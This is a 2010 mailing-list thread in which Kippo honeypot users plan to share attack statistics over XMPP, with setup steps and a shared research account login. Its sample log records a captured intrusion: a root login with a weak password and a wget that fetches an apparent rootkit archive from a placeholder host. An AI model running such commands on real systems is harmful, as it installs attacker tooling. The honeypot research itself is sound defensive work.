A free Weekend, finally

102 views
Skip to first unread message

Jacob

unread,
Oct 9, 2010, 6:03:08 PM10/9/10
to kippo...@googlegroups.com
Sorry everyone for being quiet after starting this group, but I was offered a job on the other side of the country and needed to move, start work, and all the stuff that goes with that. But I found myself with a free weekend and I decided it was a good time to setup a server with a, at least in the beginning, blog for us to collectively write about kippo and honeypots in general. we can as a group decide whether we what to do something different. Now I have no problem setting up a VPS to solely host the website and whatever other stuff we want to have there for group access. But if someone has another idea, I am willing to hear it. The second is, I no clue what domain to get for this website. any one have any ideas?

- biosshadow


Justin Elze

unread,
Oct 9, 2010, 6:27:31 PM10/9/10
to kippo...@googlegroups.com
I have hoping we could track stats on backdoors/ircbots,  popular logins, orgin of attack based on country,  place hosting the backdoor/ircbot based on country, possible google maps integration.

A number of us have also expanded to using other honeypots we could also track stats from those at some point.

If you need a domain I can lend you hackpwn.net :-)

Justin

On Sat, Oct 9, 2010 at 6:03 PM, Jacob <three...@gmail.com> wrote:
Sorry everyone for being quiet after starting this group, but I was offered a job on the other side of the country and needed to move, start work, and all the stuff that goes with that. But I found myself with a free weekend and I decided it was a good time to setup a server with a, at least in the beginning, blog for us to collectively write about kippo and honeypots in general. we can as a group decide whether we what to do something different. Now I have no problem setting up a VPS to solely host the website and whatever other stuff we want to have there for group access. But if someone has another idea, I am willing to hear it. The second is, I no clue what domain to get for this website. any one have any ideas?

- biosshadow


--
You received this message because you are subscribed to the Google Groups "kippo users" group.
To post to this group, send email to kippo...@googlegroups.com.
To unsubscribe from this group, send email to kippousers+...@googlegroups.com.
For more options, visit this group at http://groups.google.com/group/kippousers?hl=en.



--
IMPORTANT NOTICE: This e-mail and any attachments thereto is intended only
for use by the individual or entity to whom it's addressed and may be
proprietary and/or legally privileged. If you are not the intended
recipient of this e-mail, you are hereby notified that any dissemination,
distribution or copying of this email, and any attachments thereto, without
the prior written permission of the sender is strictly prohibited.   If you
receive this e-mail in error, please immediately telephone or e-mail the
sender and permanently delete the original copy and any copy of this
e-mail, and any printout thereof.

Justin Elze

unread,
Oct 22, 2010, 9:22:21 AM10/22/10
to kippo...@googlegroups.com
Bump since everyone is back to only chatting on twitter about this...

Any interest in a centralized MySQL database starting off with a few people and tracking results from around the world?

Jacob Kuehndorf

unread,
Oct 22, 2010, 9:41:32 AM10/22/10
to kippo...@googlegroups.com

I am interested in this. Not how many other ppl are, but it would make sharing stats easier.

On Oct 22, 2010 6:22 AM, "Justin Elze" <formu...@gmail.com> wrote:

AndrewWaite

unread,
Oct 22, 2010, 9:43:22 AM10/22/10
to kippo users
Justin,

theoretically should be simple, just needs a publicly accessible MySQL
daemon and people to reconfigure there sensors. However, I can see a
number of problems before this can/will get off the ground:

1> Beyond trust, how can we verify that people aren't screwing with
the data, uploading bogus info etc.?
2> How do we (safely and securely) allow those contributing access to
their data with the same abilities as if they ran locally?
3> How do we handle loosing localised data collection for 'my' sensor?

For me 3 would be the biggest hurdle, as I wouldn't want to lose
access to my own data (I'm assuming others feel similar?). I haven't
looked at the source, how easy would it be to patch/update Kippo to
log simultaneously to multiple sources?

Does the central repository need to be in real-time? Or could we
develop utilities to duplicate local logging to the central repository
(daily/weekly cron job)?

Just thinking out loud, thoughts?

--Andrew

Justin Elze wrote:
> Bump since everyone is back to only chatting on twitter about this...
>
> Any interest in a centralized MySQL database starting off with a few people
> and tracking results from around the world?
>
> On Sat, Oct 9, 2010 at 6:27 PM, Justin Elze <formu...@gmail.com> wrote:
>
> > I have hoping we could track stats on backdoors/ircbots, popular logins,
> > orgin of attack based on country, place hosting the backdoor/ircbot based
> > on country, possible google maps integration.
> >
> > A number of us have also expanded to using other honeypots we could also
> > track stats from those at some point.
> >
> > If you need a domain I can lend you hackpwn.net :-)
> >
> > Justin
> >
> >
> > On Sat, Oct 9, 2010 at 6:03 PM, Jacob <three...@gmail.com> wrote:
> >
> >> Sorry everyone for being quiet after starting this group, but I was
> >> offered a job on the other side of the country and needed to move, start
> >> work, and all the stuff that goes with that. But I found myself with a free
> >> weekend and I decided it was a good time to setup a server with a, at least
> >> in the beginning, blog for us to collectively write about kippo and
> >> honeypots in general. we can as a group decide whether we what to do
> >> something different. Now I have no problem setting up a VPS to solely host
> >> the website and whatever other stuff we want to have there for group access.
> >> But if someone has another idea, I am willing to hear it. The second is, I
> >> no clue what domain to get for this website. any one have any ideas?
> >>
> >> - biosshadow
> >> <http://jacobkuehndorf.com>
> >> <ja...@jacobkuehndorf.com>
> >>
> >> --
> >> You received this message because you are subscribed to the Google Groups
> >> "kippo users" group.
> >> To post to this group, send email to kippo...@googlegroups.com.
> >> To unsubscribe from this group, send email to
> >> kippousers+...@googlegroups.com<kippousers%2Bunsu...@googlegroups.com>
> >> .

Markus

unread,
Oct 22, 2010, 10:26:01 AM10/22/10
to kippo...@googlegroups.com
Hi,

Andrew top posting?

> Justin Elze wrote:
>> Bump since everyone is back to only chatting on twitter about this...
>>
>> Any interest in a centralized MySQL database starting off with a few people
>> and tracking results from around the world?

On Fri, Oct 22, 2010 at 3:43 PM, AndrewWaite <a...@infosanity.co.uk> wrote:
> theoretically should be simple, just needs a publicly accessible MySQL
> daemon and people to reconfigure there sensors. However, I can see a
> number of problems before this can/will get off the ground:

central db? bad idea for all obvious reasons.
I'd go for a distributed network and everybody can have his own
database, with information from all sensors as outlined? here:
http://groups.google.com/group/kippousers/msg/f0d0ecb823e67f0e

I setup docs how to install prosody and host a branch of the code with
the patches applied, http://carnivore.it/2010/10/13/xmpp_server


Markus

Justin Elze

unread,
Oct 22, 2010, 11:08:52 AM10/22/10
to kippo...@googlegroups.com
Are you going to rewrite Kippo to export data into a xmpp server?

This is what happened last time everyone jumped in with great ideas but no real motivation to follow up.

I was only talking about using a few people I have some level of trust with initially to add to a database with a website front end for results.

No issues if someone wants to make XMPP work with kippo since it obviously scales well....Kippo isn't going to catch some 0day attack or anything overly interesting.  

However was more interested in statistical information source IP, source country, password combos, where backdoors are hosted.

I was hoping to use this information in training scenarios to educate people with the general security awareness level rising this should no longer be an effective attack vector however people are continuing to scan which means its producing results.

Justin



--
You received this message because you are subscribed to the Google Groups "kippo users" group.
To post to this group, send email to kippo...@googlegroups.com.
To unsubscribe from this group, send email to kippousers+...@googlegroups.com.

For more options, visit this group at http://groups.google.com/group/kippousers?hl=en.

Upi Tamminen

unread,
Oct 22, 2010, 11:53:11 AM10/22/10
to kippo...@googlegroups.com
Until I add support for multiple log destinations, one simple way of logging
to a secondary target would be to write a little program that reads the
local database and sends data to the secondary database.

It could write to an additional table in the local kippo database to keep
track of which sessions have been sent forward.

Something like this would be easy for anyone to implement in their favorite
language and platform, and hopefully my laziness with kippo development isn't
hurting deployments like this :)

> To unsubscribe from this group, send email to kippousers+...@googlegroups.com.

Leon v/d Eijk

unread,
Oct 22, 2010, 12:20:38 PM10/22/10
to kippo...@googlegroups.com
Sounds good Upi. It is your project, so whoever calls you lazy should
get its priority's straight mate. If you need testers just roar :)

Markus

unread,
Oct 22, 2010, 4:29:22 PM10/22/10
to kippo...@googlegroups.com
Hi,

On Fri, Oct 22, 2010 at 5:08 PM, Justin Elze <formu...@gmail.com> wrote:
> Are you going to rewrite Kippo to export data into a xmpp server?

Actually I doubt a rewrite would be required in any way, it would plug
in the same way as mysql, and twisted even has multiple protocol
implementations for xmpp.

> This is what happened last time everyone jumped in with great ideas but no
> real motivation to follow up.

How can you expect anybody to contribute anything if there is no final
"we are interested in the functionality and accept patches" or at
least a basic level of interest?

> No issues if someone wants to make XMPP work with kippo since it obviously
> scales well....Kippo isn't going to catch some 0day attack or anything
> overly interesting.

I don't see the point.

> However was more interested in statistical information source IP, source
> country, password combos, where backdoors are hosted.

Which is exactly the information one could distribute via xmpp.


If you want to look at it before making a point, let me hook you up
with the required credentials to do so.


Markus

Justin Elze

unread,
Oct 22, 2010, 6:39:28 PM10/22/10
to kippo...@googlegroups.com
I'm not knocking XMPP or you in any fashion I am guessing that is how took my last email..

Last time we ran through this everyone made different suggestions and then the topic died all I want is a solution to aggregate results which can be usable in the some what near future.



Would you be the person developing the XMPP integration? What assistance/resources would you need?


Anyone else have useful suggestions?






Markus

--
You received this message because you are subscribed to the Google Groups "kippo users" group.
To post to this group, send email to kippo...@googlegroups.com.
To unsubscribe from this group, send email to kippousers+...@googlegroups.com.
For more options, visit this group at http://groups.google.com/group/kippousers?hl=en.

Markus

unread,
Oct 23, 2010, 1:19:01 AM10/23/10
to kippo...@googlegroups.com
Hi,

On Sat, Oct 23, 2010 at 12:39 AM, Justin Elze <formu...@gmail.com> wrote:
> Would you be the person developing the XMPP integration? What
> assistance/resources would you need?

Testers,

svn co https://svn.ik.nu/wokkel/branches/wokkel-muc-client-support-24 wokkel
cd wokkel
python setup.py install

svn checkout http://kippo.googlecode.com/svn/trunk/ kippo-xmpp
cd kippo-xmpp
wget http://p.carnivore.it/Kx015D?download -O /dev/stdout | patch -p0
cp kippo.cfg.dist kippo.cfg
# edit kippo.cfg, allow the xmpp section, edit kippo-revents to kippo-events
twistd -ny kippo.tac

-------------------
todo?
* currently it replaces the mysql logging, I did not understand the
twisted thing to have multiple log observers, should be fixed by
somebody who understands twisted
* the xmpp client is initialized in the tac file, it does not start
initialized somewhere else, I *guess* thats a twisted feature, but
maybe somebody who understands twisted can fix it
* set self.xmppclient.logTraffic to False if you are annoyed by the
messages /dblog/xmpp.py:57)
* the code supports anonymizing the honeypots ip address, this is
turned on by default and there is no config option yet to turn it off,
so the honeypot always reports itself as 127.0.0.1
* xmlns url for kippo is wrong
* bribe somebody to apply the patch to svn, so we can beautify it
* backend code to retrieve the messages from xmpp and store in a
database, I'd adjust the pg_backend code dionaea ships with to deal
with the kippo namespace & messages

documentation?
* it uses a special wokkel branch, which adds muc to twisteds xmpp stack.
* you specify a xmpp server, username, password, muc, and channels for
the different signals you have (client connected, client disconnected,
command, login, ...), and it joins the channel, and sends the message
to the channel.
* once ssh-action happens, it sends a proper formatted xml message to
the channel, I figured the xml format myself, it is similar to the
format I use for dionaea.

Some example messages:

CreateSession:
<kippo xmlns='http://http://kippo.googlecode.com'
type='createsession'><session local_host='127.0.0.1' local_port='2222'
session='da2dde7c2e9b4f96bdd94172eb274c9f' remote_host='192.168.53.21'
remote_port='4271'/></kippo>

ConnectionLost:
<kippo xmlns='http://http://kippo.googlecode.com'
type='connectionlost'><session
session='da2dde7c2e9b4f96bdd94172eb274c9f'/></kippo>

Command:
<kippo xmlns='http://http://kippo.googlecode.com'
type='command'><command session='349ae44535d34bab9c548f3af21f0fcd'
command='known'>cd /tmp</command></kippo>


Yep, there is *some* overhead, but it is easy to parse.


> Anyone else have useful suggestions?

Yep, I setup a privileged account for you, if you want to hack a
backend base on pg_backend, you can use the user
ki...@sensors.carnivore.it with password kippo,
you got elevated privileges on the channel kippo-events in the
dionaea.sensors.carnivore.it muc, so there is no reason not to start
hacking on it.

If you access the service with an xmpp client like psi, turn on the
"XML Console",
as the messages are unencoded xml psi does not render them properly.

If nobody stands up, I'll contribute the backend code too, and I
promise it won't be mysql compatible.


Markus

mlwrcollect

unread,
Oct 23, 2010, 6:05:34 AM10/23/10
to kippo...@googlegroups.com
Lol, nice Marcus! Gonna have a look.

mlwrcollect

unread,
Oct 23, 2010, 7:17:54 AM10/23/10
to kippo...@googlegroups.com
Works like a charm ! :)
thx!

On 10/23/10 7:19 AM, Markus wrote:

Tomasz Miklas

unread,
Oct 24, 2010, 12:59:16 PM10/24/10
to kippo users
Hey Markus

That's awesome work you did here! I'm not a python person myself but
will look into it and maybe help somehow.
Will test XMPP code ASAP - that's the way to go IMHO...

Tomasz

Markus

unread,
Oct 24, 2010, 3:36:41 PM10/24/10
to kippo...@googlegroups.com
Hi,

Client code:
Updated patch for latest kippo revision to report to xmpp:
http://p.carnivore.it/uUovYX

Installation as outlined in previous mail.

Backend code
code:
http://p.carnivore.it/RqMsyp
# aptitude install python-pyxmpp python-pgsql

with db
./pg_backend.py -U ki...@sensors.carnivore.it -P kippo -M
dionaea.sensors.carnivore.it -C kippo-events -s DBHOST -u DBUSER -d
xmpp -p DBPASS -f /tmp/

without db
./pg_backend.py -U ki...@sensors.carnivore.it -P kippo -M
dionaea.sensors.carnivore.it -C kippo-events -f /tmp/

Database schema addon which adds the required tables for kippo in the
kippo namespace:
http://p.carnivore.it/80XWG4
schema is similar to kippos own schema, basically I just got rid of
calling every primary key "id" to allow natural joining.

basic instructions for the database, I don't remember all steps, in
case you get it working, please complete the steps required.

install postgres,
create a user "xmpp"
su postgres
createuser --no-createdb --encrypted --login --pwprompt
--no-createrole --no-superuser xmpp

edit /etc/postgresql/8.4/main/pg_hba.conf
add a line to allow the xmpp user to connect to the database from
local host with password authentication
# TYPE DATABASE USER CIDR-ADDRESS METHOD
local xmpp xmpp
md5

restart postgres to have the changes taking effect.

create a database "xmpp"
createdb --owner xmpp xmpp

apply the schema, start he backend code
psql -U xmpp xmpp < theschema.sql

the backend code writes some status information on the console:
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV]
createsession: 127.0.0.1 127.0.0.1 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] version
SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] : login
False root test 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] : login
True root 123456 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] command
cd /tmp 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] command
wget http://www.example.com/root/kit.tar.gz
2390be85d17645ecb3a0b936cd275dfe

Markus

Leon v/d Eijk

unread,
Oct 27, 2010, 10:36:46 AM10/27/10
to kippo users
Works very well. I hope more people join in soon.
Great job Markus !

Leon

On 23 okt, 07:19, Markus <nepenthes...@gmail.com> wrote:
> Hi,
>
> On Sat, Oct 23, 2010 at 12:39 AM, Justin Elze <formula...@gmail.com> wrote:
> > Would you be the person developing the XMPP integration? What
> > assistance/resources would you need?
>
> Testers,
>
> svn cohttps://svn.ik.nu/wokkel/branches/wokkel-muc-client-support-24wokkel
> cd wokkel
> python setup.py install
>
> svn checkouthttp://kippo.googlecode.com/svn/trunk/kippo-xmpp
> cd kippo-xmpp
> wgethttp://p.carnivore.it/Kx015D?download-O /dev/stdout | patch -p0
Reply all
Reply to author
Forward
0 new messages